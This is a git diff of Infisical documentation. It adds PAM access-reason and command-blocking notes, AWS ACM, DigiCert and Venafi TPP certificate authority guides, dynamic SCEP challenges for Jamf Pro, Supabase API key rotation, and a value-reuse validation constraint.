@@ -14,6 +14,7 @@ An account policy is a named, project-scoped configuration that contains one or |---|---|---| | **Command Blocking** | Prevents execution of commands matching specified regex patterns. | SSH | | **Session Log Masking** | Redacts data matching specified regex patterns from session logs. | All resource types | +| **Require Access Reason** | Requires the user to provide a reason before a session can start. The reason is stored for audit. | All resource types | A policy can be **active** or **inactive**. Only active policies are enforced during sessions. @@ -34,6 +35,7 @@ Navigate to your PAM project sidebar and click **Account Policies**, then click - **Command Blocking**: Add one or more regex patterns. Commands matching any of these patterns will be blocked during SSH sessions. - **Session Log Masking**: Add one or more regex patterns. Any data matching these patterns will be redacted in session logs. + - **Require Access Reason**: Forces the user to provide a non-empty reason before they can start a session. When the rule is active, the CLI prompts for a reason (or accepts the `--reason` flag) and the browser shows a Reason Required screen before the session is created. For each rule, click the **+** button to add additional patterns. @@ -87,6 +89,12 @@ Patterns use standard regular expression syntax. Some examples: Patterns are matched as regular expressions against the full command (for command blocking) or session log content (for session log masking). Test your patterns carefully to avoid overly broad matches. + + Command blocking helps prevent unintended or careless commands from reaching the target, adding a guardrail in front of systems where direct controls on the target resource aren't available. + + Because matches are evaluated with regular expressions, patterns need to cover the different ways a command might be typed, and exhaustive coverage of every variation is difficult to guarantee in practice. It is highly recommended to pair command blocking with target-side controls like restricted shells or `sudoers` rules where those are available. + + ## FAQ diff --git a/docs/documentation/platform/pki/ca/aws-acm-public-ca.mdx b/docs/documentation/platform/pki/ca/aws-acm-public-ca.mdx new file mode 100644 index 00000000000..d9f2ae91608 --- /dev/null +++ b/docs/documentation/platform/pki/ca/aws-acm-public-ca.mdx @@ -0,0 +1,174 @@ +--- +title: "AWS ACM Public CA" +description: "Issue and manage publicly-trusted certificates using AWS Certificate Manager (ACM) with Infisical." +--- + +## Overview + +Infisical integrates with AWS Certificate Manager (ACM) to issue **public certificates** signed by [Amazon Trust Services](https://www.amazontrust.com/repository/). These certificates are trusted by all major browsers and operating systems out of the box, so they can be used on the public internet without users having to install anything. + +Common use cases include securing public-facing websites and APIs, terminating TLS on internet-facing load balancers, and issuing certificates for SaaS applications exposed to external users. + +Each certificate has a fixed 198-day validity and is generated and stored by AWS. Infisical orchestrates the full lifecycle on top: domain validation via Route 53, saving the certificate and private key into Infisical, scheduled auto-renewal, and revocation. + + + Domain validation is performed exclusively through **Amazon Route 53**. Other DNS providers are not supported for this CA type. + + +## Prerequisites + +- Two [AWS App Connections](/integrations/app-connections/aws): one for ACM, one for Route 53. They can be the same connection if it has permissions for both services. +- A Route 53 **public** hosted zone for the domains you will issue certificates for. + +### IAM Permissions + +**ACM connection** β€” needs the following on certificates in your account: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "acm:RequestCertificate", + "acm:DescribeCertificate", + "acm:ExportCertificate", + "acm:RenewCertificate", + "acm:RevokeCertificate", + "acm:ListCertificates" + ], + "Resource": "*" + } + ] +} +``` + + + `RequestCertificate` cannot be scoped below `"*"` because the certificate ARN does not exist until after the call succeeds. + + +**Route 53 connection** β€” needs the following on your hosted zone so Infisical can write the ACM validation CNAME records: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "route53:GetHostedZone", + "route53:ChangeResourceRecordSets" + ], + "Resource": "arn:aws:route53:::hostedzone/YOUR_HOSTED_ZONE_ID" + } + ] +} +``` + +## Setup + + + + In the AWS Console, navigate to **Route 53 β†’ Hosted zones** and select the public hosted zone for the domain(s) you will issue certificates for. Copy the **Hosted Zone ID** from the details panel. + ![Copy Hosted Zone ID](/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-copy-hosted-zone-id.png) + + + + In your Infisical project, go to **Certificate Authorities** and scroll to the **External Certificate Authorities** section. + ![External CA Page](/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-page.png) + + + + Click **Create CA** and configure: + - **CA Type**: **AWS ACM Public CA** + - **Name**: lowercase letters, numbers, and hyphens + - **AWS Connection**: the connection with ACM permissions + - **Route 53 Connection**: the connection with Route 53 permissions (can be the same as above) + - **Hosted Zone ID**: the Route 53 public hosted zone ID from the previous step + - **Region**: the ACM region to issue from + + ![External CA Form](/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-form.png) + + + + Create a certificate profile linked to this CA, then submit a certificate request. Infisical requests the certificate from ACM, writes the required CNAME(s) to Route 53, waits for ACM to finish validation, and saves the certificate and private key. + ![Certificate Created](/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-certificate-created.png) + + + +## Auto-Renewal + +ACM certificates expire after 198 days. There are two renewal paths that both end up producing a fresh certificate in Infisical. + +### AWS managed renewal + +AWS attempts to automatically renew ACM public certificates 45 days before expiry. This is [ACM managed renewal](https://docs.aws.amazon.com/acm/latest/userguide/managed-renewal.html) and happens on AWS's schedule, independent of Infisical. When it succeeds, AWS issues a new certificate body and private key under the **same ARN** but with a new serial number. + +The catch: AWS only updates the copy held inside ACM. The copy saved in Infisical still holds the old material until something pulls the new version out. + +### Infisical auto-renewal + +To keep the copy stored in Infisical in sync with AWS, enable auto-renewal on the certificate profile when you create or edit it: + +- **Auto-renew**: enabled +- **Renew before days**: how many days before expiry renewal should fire (1–30 days) + +Every certificate issued through that profile inherits these values. You can also override them on an individual certificate from **Certificates β†’ Manage Renewal**. + +When a certificate reaches the configured threshold, Infisical reconciles it with AWS: + +- If AWS has **already renewed** the certificate on its own, Infisical pulls in the new certificate and private key. +- If AWS has **not yet renewed**, Infisical triggers renewal, waits for ACM to finish re-issuance, then saves the new material. + +In both cases the renewed certificate is stored as a new entry linked to the original and inherits the same auto-renewal settings β€” so the cycle continues automatically. + + + AWS generates a fresh private key on every renewal. Infisical pulls it in each time and stores it encrypted with your project's KMS key. + + +## Troubleshooting + +**`Failed to reach AWS Certificate Manager`** β€” the ACM connection credentials are invalid or missing the IAM permissions above. + +**`Failed to access Route 53 hosted zone`** β€” the Route 53 connection cannot read the hosted zone, or the Hosted Zone ID is wrong. Check `route53:GetHostedZone` and that the zone is public. + +**Request stays pending** β€” DNS validation can take several minutes. Infisical retries automatically. Verify the CNAME records exist in Route 53 and that the hosted zone is authoritative for the requested domain. + +**Renewal appears stuck** β€” immediately after renewal is triggered, ACM may not yet have the new certificate available. Infisical treats this as transient and retries until a new serial number appears on the ARN. + +## FAQ + + + + AWS issues every ACM public certificate with a fixed 198-day validity. + + + + Only Amazon Route 53. Infisical writes the required CNAMEs through your Route 53 connection. + + + + No. ACM generates the key pair itself. Infisical pulls the certificate and private key from ACM and stores them encrypted. + + + + `RSA_2048`, `EC_prime256v1` (ECDSA P-256), and `EC_secp384r1` (ECDSA P-384). + + + + No. ACM does not accept subject fields beyond the common name (O, OU, C, ST, L are ignored). + + + + No. ACM applies its own policy on every issued certificate. + + + + Certificate profiles backed by AWS ACM Public CA support only **API** enrollment. EST, SCEP, and ACME rely on submitting a CSR for the CA to sign, but ACM generates the private key itself and does not accept a CSR. + + + + No. ACM Public CA only issues end-entity (leaf) certificates. + + diff --git a/docs/documentation/platform/pki/ca/digicert-direct.mdx b/docs/documentation/platform/pki/ca/digicert-direct.mdx new file mode 100644 index 00000000000..3f36b770189 --- /dev/null +++ b/docs/documentation/platform/pki/ca/digicert-direct.mdx @@ -0,0 +1,74 @@ +--- +title: "DigiCert (CertCentral Services API)" +description: "Issue OV/EV certificates from DigiCert using the CertCentral Services API with manual DNS validation." +--- + +## Concept + +Infisical can issue OV and EV TLS certificates directly from [DigiCert CertCentral](https://www.digicert.com/) using the [CertCentral Services API](https://dev.digicert.com/en/certcentral-apis/services-api.html). + +## Prerequisites + +- A [DigiCert App Connection](/integrations/app-connections/digicert) with a validated CertCentral API key. +- A CertCentral **Organization** that has been pre-validated by DigiCert +- Entitlement to either the OV or EV SSL product on your CertCentral account. + +## Create a DigiCert Certificate Authority + + + + + + Follow the [DigiCert App Connection guide](/integrations/app-connections/digicert) to store your CertCentral API key in Infisical. + + + In your Certificate Manager project, navigate to **Certificate Authorities**, click **Create CA** in the External Certificate Authorities section, choose **DigiCert CertCentral** as the type, and fill out the form: + + - **App Connection** β€” the DigiCert connection you created + - **Organization** β€” the CertCentral organization that should appear on issued certificates + - **Product** β€” the CertCentral entitlement this CA will issue under + + ![DigiCert External CA Form](/images/platform/pki/digicert/digicert-external-ca-form.png) + + + + + To create a DigiCert Certificate Authority, make an API request to the [Create DigiCert CA](/api-reference/endpoints/certificate-authorities/digicert/create) API endpoint. + + ```bash Create a DigiCert CA + curl --request POST \ + --url https://app.infisical.com/api/v1/pki/ca/digicert \ + --header 'Content-Type: application/json' \ + --data '{ + "projectId": "", + "name": "digicert-ov", + "status": "active", + "configuration": { + "appConnectionId": "", + "organizationId": 112236, + "productNameId": "ssl_plus" + } + }' + ``` + + + +## Issue a certificate + +After creating the CA and a Certificate Profile, request a certificate as you normally would. The request will move through the following states: + +1. **Pending Validation**: DigiCert has accepted the order. Complete the domain control validation directly in DigiCert CertCentral. +2. Your team completes validation on the CertCentral side. +3. Infisical re-checks DigiCert. If you don't want to wait, click **Trigger Validation** on the request row to force an immediate check. When DigiCert confirms the order, Infisical downloads the certificate and chain and moves the request to **Issued**. +4. If DigiCert does not issue within 24 hours the request transitions to **Failed**. Complete validation on CertCentral and submit a new request. + +## FAQ + + + + Revoking the certificate in Infisical immediately marks it `Revoked` in the local inventory + **and** submits a revocation request to DigiCert CertCentral against the underlying order. + Depending on your CertCentral account's revocation policy, DigiCert may queue that request for + administrator approval before the certificate is actually revoked on their side. + + diff --git a/docs/documentation/platform/pki/ca/venafi-tpp.mdx b/docs/documentation/platform/pki/ca/venafi-tpp.mdx new file mode 100644 index 00000000000..9761d1fb7b8 --- /dev/null +++ b/docs/documentation/platform/pki/ca/venafi-tpp.mdx @@ -0,0 +1,79 @@ +--- +title: "Venafi TPP" +description: "Learn how to issue and manage certificates using a self-hosted Venafi Trust Protection Platform (TPP) instance with Infisical." +--- + +Issue and manage certificates using a self-hosted Venafi Trust Protection Platform (TPP) instance as an external CA, with support for airgapped environments via Infisical Gateway. + +## Prerequisites + +- A [Venafi TPP Connection](/integrations/app-connections/venafi-tpp) configured in your organization +- A policy folder in your TPP instance configured with an appropriate CA template +- Network connectivity from Infisical (or an Infisical Gateway) to the TPP server + +## Setting Up Venafi TPP as an External CA + + + + In your Infisical project, go to your **Certificate Project** > **Certificate Authority** to access the external CAs page. + ![External CA Page](/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-page.png) + + + Click **Create CA** and configure: + + - **Type**: Choose **Venafi TPP** + - **Name**: A friendly name for this CA (e.g., "Production TPP CA") + - **Status**: Set to **Active** to enable certificate issuance + - **Venafi TPP Connection**: Select your TPP connection from the dropdown + - **Policy DN**: The policy folder path in TPP where certificates will be managed (e.g., `\VED\Policy\Certificates\WebServers`) + + ![External CA Form](/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-form.png) + + + The Policy DN must point to an existing policy folder in your TPP instance. The policy folder + determines which CA template is used for signing, what subject fields are allowed, and other + certificate constraints. Make sure the policy folder is configured to allow certificate requests + from the credentials used in your TPP connection. + + + + Your Venafi TPP CA is now ready. You can use it with certificate profiles to issue certificates. + ![External CA Created](/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-created.png) + + + +## Issuing Certificates + +Once your Venafi TPP CA is set up, you issue certificates through **Certificate Profiles**: + + + + Go to **Policies** > **Certificate Profiles** and create a new profile: + + - Set the **Issuing CA** to your Venafi TPP CA + - Configure the **Enrollment Method** as **API** + - Set default certificate attributes (common name, SANs, key algorithm, TTL, etc.) + + ![Create Profile](/images/platform/pki/certificate/cert-profile-modal.png) + + + Go to **Certificates** and click **Issue Certificate**: + + - Select the profile linked to your Venafi TPP CA + - Fill in the certificate details (common name, SANs, TTL) + - Click **Issue** + + ![Issue Certificate](/images/platform/pki/certificate/cert-issue-modal.png) + + The certificate request is submitted to TPP asynchronously. Infisical will authenticate with TPP, submit the CSR to the configured policy folder, and retrieve the signed certificate. + + + Certificate issuance is asynchronous. Infisical will poll TPP for the signed certificate for + up to ~5 minutes. Ensure your TPP policy folder is configured for automatic approval. + + + + Your certificate has been issued by the TPP server and is ready for use. + ![Certificate Created](/images/platform/pki/venafi-tpp/venafi-tpp-certificate-created.png) + + diff --git a/docs/documentation/platform/pki/discovery/network.mdx b/docs/documentation/platform/pki/discovery/network.mdx index 44aba032d4c..247361e15ac 100644 --- a/docs/documentation/platform/pki/discovery/network.mdx +++ b/docs/documentation/platform/pki/discovery/network.mdx @@ -5,6 +5,10 @@ description: "Learn how to configure a Network discovery job to find certificate Network discovery scans network endpoints over TLS to discover certificates served by hosts across IP ranges and domains. Optionally, you can use an [Infisical Gateway](/documentation/platform/gateways/overview) to reach endpoints in private networks that are not accessible from the internet. + + If you are self-hosting Infisical, you can alternatively set the [`ALLOW_INTERNAL_IP_CONNECTIONS`](/self-hosting/configuration/envars#param-allow-internal-ip-connections) environment variable to `true` on your instance to scan private networks directly without a gateway. + + 1. Navigate to your Certificate Management Project > **Discovery** and press **Add Job**. diff --git a/docs/documentation/platform/pki/enrollment-methods/scep.mdx b/docs/documentation/platform/pki/enrollment-methods/scep.mdx index ba27c3aac56..662c08b6c02 100644 --- a/docs/documentation/platform/pki/enrollment-methods/scep.mdx +++ b/docs/documentation/platform/pki/enrollment-methods/scep.mdx @@ -27,6 +27,43 @@ For self-hosted Infisical instances, replace `app.infisical.com` with your insta - A SCEP-compatible client (e.g., [sscep](https://github.com/certnanny/sscep)) or a network device with built-in SCEP support. - A certificate profile with a **CA-issued** issuer type. +## Challenge Types + +Infisical supports two challenge authentication modes for SCEP enrollment: + + + + A single shared secret password is configured on the certificate profile. All SCEP clients must include this password in their certificate signing request (CSR) to authenticate. + + This is the simplest option and works well when the same challenge password is acceptable for all devices enrolling through the profile. + + - The challenge password must be at least 8 characters. + - The password is hashed before storage and cannot be retrieved after creation. + + + One-time-use challenge passwords are generated on demand via an authenticated API endpoint. Each challenge can only be used once and expires after a configurable time period. + + This mode is designed for MDM tools like **Jamf Pro** that support fetching a challenge from an external webhook before delivering the SCEP profile to a device. + + When dynamic challenges are enabled, Infisical exposes a challenge endpoint at: + + ``` + https://app.infisical.com/scep/{profile_id}/challenge + ``` + + The endpoint accepts authenticated `POST` requests and returns a plain-text one-time challenge password. The caller must authenticate using a [Machine Identity](/documentation/platform/identities/machine-identities) access token. + + The following settings are part of the certificate profile configuration and apply to all challenges generated for this profile: + + - **Challenge Expiry (minutes)**: How long each generated challenge remains valid before expiring. Default: 60 minutes. Maximum: 1440 minutes (24 hours). + - **Max Pending Challenges**: Maximum number of unused challenges that can exist at once. Default: 100. Maximum: 1000. + + + Dynamic challenges are consumed on first use. Once a device successfully enrolls with a challenge, that challenge cannot be reused. Expired and used challenges are automatically cleaned up. + + + + ## Guide to Certificate Enrollment via SCEP In the following steps, we walk through how to issue an X.509 certificate using the SCEP enrollment method. @@ -37,7 +74,10 @@ In the following steps, we walk through how to issue an X.509 certificate using Here's some guidance on each SCEP-specific configuration field: - - **Challenge Password**: A shared secret that SCEP clients must include in their certificate signing request (CSR) to authenticate with Infisical's SCEP server. Must be at least 8 characters. + - **Challenge Type**: Select **Static** for a shared password or **Dynamic** for one-time-use challenges generated via API. See [Challenge Types](#challenge-types) above. + - **Challenge Password** (static only): A shared secret that SCEP clients must include in their certificate signing request (CSR) to authenticate with Infisical's SCEP server. Must be at least 8 characters. + - **Challenge Expiry** (dynamic only): How long each generated challenge remains valid, in minutes. + - **Max Pending Challenges** (dynamic only): Maximum number of unused challenges that can exist at once. - **Include CA Cert in Response**: When enabled, the CA certificate chain is included alongside the RA certificate in the GetCACert response. Most SCEP clients expect this to be enabled (default: enabled). - **Allow Certificate-Based Renewal**: When enabled, devices that already hold a valid certificate issued by the same CA can renew their certificate without providing the challenge password (default: enabled). @@ -53,79 +93,114 @@ In the following steps, we walk through how to issue an X.509 certificate using Where `{profile_id}` is the UUID of the certificate profile. This is the URL you provide to your SCEP clients as the SCEP server URL. + For profiles with **dynamic challenges** enabled, you will also see a **Challenge Endpoint URL**: + + ``` + https://app.infisical.com/scep/{profile_id}/challenge + ``` + + This is the URL your MDM tool or automation calls to generate one-time challenge passwords. + Provide the **SCEP endpoint URL** and **challenge password** from the previous steps to your SCEP client. - Below is an example using [sscep](https://github.com/certnanny/sscep), an open-source SCEP client. + + + Below is an example using [sscep](https://github.com/certnanny/sscep), an open-source SCEP client. - **1. Retrieve the CA/RA certificates:** + **1. Retrieve the CA/RA certificates:** - ```bash - sscep getca \ - -u https://app.infisical.com/scep/{profile_id}/pkiclient.exe \ - -c ca.pem - ``` + ```bash + sscep getca \ + -u https://app.infisical.com/scep/{profile_id}/pkiclient.exe \ + -c ca.pem + ``` - This writes the RA certificate to `ca.pem-0` and the CA certificate to `ca.pem-1` (when "Include CA Cert in Response" is enabled). + This writes the RA certificate to `ca.pem-0` and the CA certificate to `ca.pem-1` (when "Include CA Cert in Response" is enabled). - **2. Generate a device key and CSR with the challenge password:** + **2. Generate a device key and CSR with the challenge password:** - The challenge password must be embedded in the CSR as a PKCS#9 attribute. Create an OpenSSL config file to include it: + The challenge password must be embedded in the CSR as a PKCS#9 attribute. Create an OpenSSL config file to include it: - ```bash - cat > device-csr.cnf << 'EOF' - [req] - default_bits = 2048 - prompt = no - distinguished_name = dn - attributes = req_attributes - - [dn] - CN = my-device.example.com - - [req_attributes] - challengePassword = your-challenge-password - EOF - - # Generate the key and CSR - openssl genrsa -out device.key 2048 - openssl req -new -key device.key -out device.csr -config device-csr.cnf - ``` + ```bash + cat > device-csr.cnf << 'EOF' + [req] + default_bits = 2048 + prompt = no + distinguished_name = dn + attributes = req_attributes - **3. Create a self-signed certificate for the sscep signing identity:** + [dn] + CN = my-device.example.com - sscep requires a local signing certificate to sign the SCEP request envelope: + [req_attributes] + challengePassword = your-challenge-password + EOF - ```bash - openssl x509 -req -in device.csr -signkey device.key \ - -out device-selfsigned.pem -days 1 - ``` + # Generate the key and CSR + openssl genrsa -out device.key 2048 + openssl req -new -key device.key -out device.csr -config device-csr.cnf + ``` - **4. Enroll via SCEP:** + **3. Create a self-signed certificate for the sscep signing identity:** - ```bash - sscep enroll \ - -u https://app.infisical.com/scep/{profile_id}/pkiclient.exe \ - -c ca.pem-0 \ - -k device.key \ - -r device.csr \ - -l device-cert.pem \ - -K device.key \ - -O device-selfsigned.pem \ - -E aes256 \ - -S sha256 - ``` + sscep requires a local signing certificate to sign the SCEP request envelope: - On success, the issued certificate is written to `device-cert.pem`. + ```bash + openssl x509 -req -in device.csr -signkey device.key \ + -out device-selfsigned.pem -days 1 + ``` - - Flag reference for the enroll command: - - `-c ca.pem-0` is the RA certificate from step 1 - - `-K` / `-O` are the signing key and self-signed certificate used to sign the SCEP message envelope - - `-E aes256` selects AES-256-CBC encryption - - `-S sha256` selects SHA-256 for the message digest - + **4. Enroll via SCEP:** + + ```bash + sscep enroll \ + -u https://app.infisical.com/scep/{profile_id}/pkiclient.exe \ + -c ca.pem-0 \ + -k device.key \ + -r device.csr \ + -l device-cert.pem \ + -K device.key \ + -O device-selfsigned.pem \ + -E aes256 \ + -S sha256 + ``` + + On success, the issued certificate is written to `device-cert.pem`. + + + Flag reference for the enroll command: + - `-c ca.pem-0` is the RA certificate from step 1 + - `-K` / `-O` are the signing key and self-signed certificate used to sign the SCEP message envelope + - `-E aes256` selects AES-256-CBC encryption + - `-S sha256` selects SHA-256 for the message digest + + + + For dynamic challenges, you first generate a one-time challenge password via the API, then use it as the challenge password in the SCEP enrollment. + + **1. Generate a dynamic challenge:** + + ```bash + curl -s -X POST \ + https://app.infisical.com/scep/{profile_id}/challenge \ + -H "Authorization: Bearer " + ``` + + The response body is the plain-text challenge password. Save it for use in the enrollment. + + **2. Use the challenge in your SCEP enrollment:** + + Follow the same steps as the static challenge flow above, but use the dynamically generated challenge password instead of a fixed one. + + + Each dynamic challenge can only be used once. If enrollment fails, generate a new challenge and retry. + + + For MDM integrations (Jamf Pro, Ivanti, etc.), the MDM tool handles this automatically via webhook. See the [Jamf Pro integration guide](/documentation/platform/pki/integration-guides/jamf-pro-scep) for details. + + SCEP uses CMS/PKCS#7 encrypted messages to protect the certificate request in transit. The challenge password is included inside the encrypted envelope and is never sent in plaintext over the network. @@ -173,6 +248,11 @@ Infisical's SCEP server supports the following algorithms for the CMS message ex The RA (Registration Authority) certificate is automatically generated when you create a SCEP-enabled certificate profile. It is used to encrypt and sign the SCEP message exchange between the client and server. The RA certificate has a 10-year validity and is separate from your CA certificate. + + Use **static challenges** for simple setups where a shared password is acceptable, such as network devices or test environments. + + Use **dynamic challenges** when integrating with MDM tools (Jamf Pro, Ivanti, Workspace ONE) that support fetching one-time challenges via webhook. Dynamic challenges provide stronger security since each challenge can only be used once and expires automatically. + Yes, if **Allow Certificate-Based Renewal** is enabled on the certificate profile. Devices that already hold a valid certificate issued by the same CA can submit a renewal request (RenewalReq) signed with their existing certificate, without needing the challenge password. diff --git a/docs/documentation/platform/pki/integration-guides/jamf-pro-scep.mdx b/docs/documentation/platform/pki/integration-guides/jamf-pro-scep.mdx index fcaea5d1aac..8d4b6723aeb 100644 --- a/docs/documentation/platform/pki/integration-guides/jamf-pro-scep.mdx +++ b/docs/documentation/platform/pki/integration-guides/jamf-pro-scep.mdx @@ -7,6 +7,8 @@ This guide demonstrates how to use Infisical to issue and distribute certificate With this integration, Jamf Pro acts as the SCEP client on behalf of your managed devices, once a configuration profile is saved and scoped, enrolled devices automatically receive certificates issued by your Infisical Certificate Manager without any manual intervention on the device. +Infisical supports both **static** and **dynamic** SCEP challenges with Jamf Pro. Dynamic challenges provide stronger security by generating a unique, one-time-use challenge password for each device enrollment. + ## Prerequisites Before you begin, make sure you have: @@ -14,6 +16,7 @@ Before you begin, make sure you have: - A [Jamf Pro](https://www.jamf.com/products/jamf-pro/) instance with administrative access. - A [certificate profile](/documentation/platform/pki/certificates/profiles) configured with the [SCEP enrollment method](/documentation/platform/pki/enrollment-methods/scep) in Infisical. Refer to the [SCEP enrollment guide](/documentation/platform/pki/enrollment-methods/scep) for setup instructions. - One or more computers or mobile devices enrolled in Jamf Pro. +- For **dynamic challenges**: A [Machine Identity](/documentation/platform/identities/machine-identities) with access to the project containing the certificate profile. ## Guide @@ -24,7 +27,34 @@ Before you begin, make sure you have: From the certificate profile, gather the following values: - **SCEP URL**: The SCEP endpoint URL for your certificate profile. This takes the form `https://app.infisical.com/scep/{profile_id}/pkiclient.exe`. For self-hosted instances, replace `app.infisical.com` with your instance's domain. - - **Challenge Password**: The shared secret configured on the SCEP enrollment method. + + + + - **Challenge Password**: The shared secret configured on the SCEP enrollment method. + + + - **Challenge Endpoint URL**: The authenticated endpoint for generating one-time challenges. This takes the form `https://app.infisical.com/scep/{profile_id}/challenge`. + - **Machine Identity Access Token**: An access token for a Machine Identity with permissions on the project. You can obtain this by authenticating a [Machine Identity](/documentation/platform/identities/machine-identities) configured with [Token Auth](/documentation/platform/identities/token-auth). + + With dynamic challenges, Jamf Pro calls a webhook to fetch a one-time challenge password for each device enrollment. Configure this webhook now: + + ![Jamf Pro webhook configuration for SCEP challenges](/images/platform/pki/integrations/jamf-pro/jamf-webhook-config.png) + + 1. In Jamf Pro, navigate to **Settings** > **Global Management** > **Webhooks**. + 2. Click **+ New** to create a new webhook. + 3. Configure the webhook with the following settings: + - **Display Name**: A descriptive name (e.g., `Infisical SCEP Challenge`). + - **Enabled**: Check this box. + - **Webhook URL**: Enter the **Challenge Endpoint URL** from above. + - **Authentication Type**: Select **Header Authentication**. + - **Header Name**: Enter `Authorization`. + - **Header Value**: Enter `Bearer `. + - **Content Type**: Select **JSON**. + - **Webhook Event**: Select **SCEPChallenge**. + 4. Click **Save**. + + + @@ -63,13 +93,20 @@ Before you begin, make sure you have: Next, configure the challenge authentication: - + - **Challenge Type**: Select **Static** from the dropdown. - **Challenge**: Enter the **Challenge Password** from your Infisical certificate profile. - **Verify Challenge**: Re-enter the challenge password to confirm. ![SCEP configuration β€” Challenge and certificate options](/images/platform/pki/integrations/jamf-pro/scep-config-challenge.png) + + - **Challenge Type**: Select **Dynamic** from the dropdown. + + No manual challenge password entry is needed, Jamf Pro automatically calls the webhook configured in step 1 to fetch a one-time challenge for each device enrollment. + + ![SCEP configuration β€” Dynamic challenge type selected](/images/platform/pki/integrations/jamf-pro/scep-config-challenge-dynamic.png) + Finally, configure the remaining certificate options: diff --git a/docs/documentation/platform/secret-rotation/supabase-api-key.mdx b/docs/documentation/platform/secret-rotation/supabase-api-key.mdx new file mode 100644 index 00000000000..c4b95b293ec --- /dev/null +++ b/docs/documentation/platform/secret-rotation/supabase-api-key.mdx @@ -0,0 +1,124 @@ +--- +title: "Supabase API Key" +description: "Learn how to automatically rotate Supabase API keys." +--- + + + **Rotation Type: Dual-Phase** + + This rotation maintains two active credential sets with overlapping validity, ensuring zero-downtime during rotation cycles. + + +## Prerequisites + +- Create a [Supabase Connection](/integrations/app-connections/supabase). That connection is used to create and delete API keys on your behalf during rotation. + +## Create a Supabase API Key Rotation in Infisical + + + + 1. Navigate to your Secret Manager Project's Dashboard and select **Add Secret Rotation** from the actions dropdown. + + ![Secret Manager Dashboard](/images/secret-rotations-v2/generic/add-secret-rotation.png) + + 2. Select the **Supabase API Key** option. + + ![Select Supabase API Key](/images/secret-rotations-v2/supabase-api-key/select-supabase-api-key.png) + + 3. Configure the rotation behavior, then click **Next**. + + - **Supabase Connection** – The connection that will create and delete API keys during rotation. + - **Rotation Interval** – The interval, in days, after which a rotation is triggered. + - **Rotate At** – The local time of day when rotation runs once the interval has elapsed. + - **Auto-Rotation Enabled** – Whether to rotate automatically on the interval. Turn off to rotate only manually or pause rotation. + + ![Rotation Configuration](/images/secret-rotations-v2/supabase-api-key/configuration.png) + + 4. Set the Supabase API key parameters, then click **Next**. + + - **Project** – The Supabase project to rotate the API key for. + - **Key Type** – The type of the API key to rotate: + - `publishable` – The public `anon` key, safe to expose in client-side code. It is used with Row Level Security (RLS) policies to control per-user access. + - `secret` – The `service_role` key, which bypasses RLS entirely and has full access to your project's data. Must be kept server-side only. + + ![Rotation Parameters](/images/secret-rotations-v2/supabase-api-key/parameters.png) + + 5. Specify the secret name that the rotated API key will be mapped to. Then click **Next**. + + - **API Key** – The name of the secret in Infisical where the rotated API key value will be stored. + + ![Rotation Secrets Mapping](/images/secret-rotations-v2/supabase-api-key/secrets-mapping.png) + + 6. Give your rotation a name and description (optional). Then click **Next**. + + - **Name** – A slug-friendly name for this rotation configuration. + - **Description** (optional) – Notes about this rotation. + + ![Rotation Details](/images/secret-rotations-v2/supabase-api-key/details.png) + + 7. Review your configuration, then click **Create Secret Rotation**. + + ![Rotation Review](/images/secret-rotations-v2/supabase-api-key/review.png) + + 8. Your **Supabase API Key** rotation is created. The current API key is available as a secret at the mapped path. Rotations will create a new key, switch the active secret to it, then revoke the previous key for zero-downtime rotation. + + ![Rotation Created](/images/secret-rotations-v2/supabase-api-key/created.png) + + + To create a Supabase API Key rotation, call the [Create Supabase API Key Rotation](/api-reference/endpoints/secret-rotations/supabase-api-key/create) API endpoint. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://us.infisical.com/api/v2/secret-rotations/supabase-api-key \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-supabase-rotation", + "projectId": "", + "description": "Supabase API key rotation", + "connectionId": "", + "environment": "dev", + "secretPath": "/", + "isAutoRotationEnabled": true, + "rotationInterval": 30, + "rotateAtUtc": { + "hours": 0, + "minutes": 0 + }, + "parameters": { + "projectRef": "", + "keyType": "secret" + }, + "secretsMapping": { + "apiKey": "SUPABASE_API_KEY" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "secretRotation": { + "id": "", + "name": "my-supabase-rotation", + "description": "Supabase API key rotation", + "secretsMapping": { + "apiKey": "SUPABASE_API_KEY" + }, + "isAutoRotationEnabled": true, + "activeIndex": 0, + "connectionId": "", + "rotationInterval": 30, + "rotateAtUtc": { "hours": 0, "minutes": 0 }, + "type": "supabase-api-key", + "parameters": { + "projectRef": "", + "keyType": "secret" + } + } + } + ``` + + diff --git a/docs/documentation/platform/secret-validation-rules.mdx b/docs/documentation/platform/secret-validation-rules.mdx index d977528bad1..3075d464680 100644 --- a/docs/documentation/platform/secret-validation-rules.mdx +++ b/docs/documentation/platform/secret-validation-rules.mdx @@ -29,8 +29,9 @@ Each rule contains one or more constraints. A constraint specifies what to check | **Regex Pattern** | The target must match a regular expression | Key must match `^[A-Z][A-Z0-9_]*$` | | **Required Prefix** | The target must start with specific text | Value must start with `https://` | | **Required Suffix** | The target must end with specific text | Key must end with `_SECRET` | +| **Prevent Value Reuse** | The new value must not match any of the last N versions | Value must not match the last 10 versions | -Each constraint can be applied to either the secret key or the secret value. +Each constraint _(except Prevent Value Reuse)_ can be applied to either the secret key or the secret value. **Prevent Value Reuse** applies only to the secret value. ### Scoping Rules @@ -68,7 +69,7 @@ This means you can have different validation standards for different parts of yo **Constraints** - Click **Add Constraint** and choose from the available constraint types. For each constraint, select whether it applies to the secret **key** or **value**, then provide the constraint parameter (length, pattern, prefix, or suffix). + Click **Add Constraint** and choose from the available constraint types. For each constraint, select whether it applies to the secret **key** or **value**, then provide the constraint parameter (length, pattern, prefix, suffix, or number of previous versions). You can add multiple constraints to a single rule. All constraints must pass for a secret to be accepted. @@ -120,4 +121,12 @@ For example, you cannot have two separate "Regex Pattern on key" constraints in This helps distinguish production secrets from those in other environments. + + + Create a rule with a **Prevent Value Reuse** constraint on the **secret value**: + + - Previous versions: `10` + + When a secret is updated, its new value is validated against the specified number of prior versions. This is useful for enforcing rotation policies and ensuring that secrets are not recycled. + diff --git a/docs/documentation/platform/webhooks.mdx 